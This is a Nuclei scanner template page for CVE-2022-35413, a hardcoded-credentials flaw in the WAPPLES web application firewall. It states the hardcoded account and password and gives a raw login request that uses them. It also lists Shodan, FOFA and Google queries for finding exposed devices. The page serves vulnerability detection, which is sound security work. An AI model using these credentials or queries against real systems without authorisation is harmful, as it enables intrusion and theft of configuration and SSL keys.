WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials
ID: CVE-2022-35413
Severity: critical
Author: For3stCo1d
Tags: cve,cve2022,wapples,firewall,default-login,pentasecurity
Description
Section titled “Description”WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001.
YAML Source
Section titled “YAML Source”id: CVE-2022-35413
info: name: WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials author: For3stCo1d severity: critical description: | WAPPLES Web Application Firewall through 6.0 contains a hardcoded credentials vulnerability. It contains a hardcoded system account accessible via db/wp.no1, as configured in the /opt/penta/wapples/script/wcc_auto_scaling.py file. An attacker can use this account to access system configuration and confidential information, such as SSL keys, via an HTTPS request to the /webapi/ URI on port 443 or 5001. impact: | An attacker can exploit this vulnerability to gain unauthorized access to the WAPPLES Web Application Firewall. remediation: | Upgrade to a version of WAPPLES Web Application Firewall that does not contain hardcoded credentials or apply the vendor-provided patch to fix the vulnerability. reference: - https://medium.com/@_sadshade/wapples-web-application-firewall-multiple-vulnerabilities-35bdee52c8fb - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-35413 - https://azuremarketplace.microsoft.com/en/marketplace/apps/penta-security-systems-inc.wapples_sa_v6?tab=Overview - https://nvd.nist.gov/vuln/detail/CVE-2022-35413 - https://www.pentasecurity.com/product/wapples/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-35413 cwe-id: CWE-798 epss-score: 0.72077 epss-percentile: 0.97989 cpe: cpe:2.3:a:pentasecurity:wapples:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: pentasecurity product: wapples shodan-query: - http.title:"Intelligent WAPPLES" - http.title:"intelligent wapples" fofa-query: title="intelligent wapples" google-query: intitle:"intelligent wapples" tags: cve,cve2022,wapples,firewall,default-login,pentasecurity
http: - raw: - | POST /webapi/auth HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
id={{username}}&password={{password}}
payloads: username: - systemi password: - db/wp.no1 attack: pitchfork
matchers-condition: and matchers: - type: word part: body words: - '"res_msg":"Authentication Success."' - '"doc_id":"user_systemi"' condition: and
- type: word part: header words: - WP_SESSID=
- type: status status: - 200# digest: 4a0a00473045022014e79d7ef248635d5675a7a9f0216bd9bec5f46558cf3d27c9e8e53604a943f6022100e17f7a773ed71e63763cff2e3580a1712365fb68c8f8d56dd6500c07c4d09af7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-35413.yaml"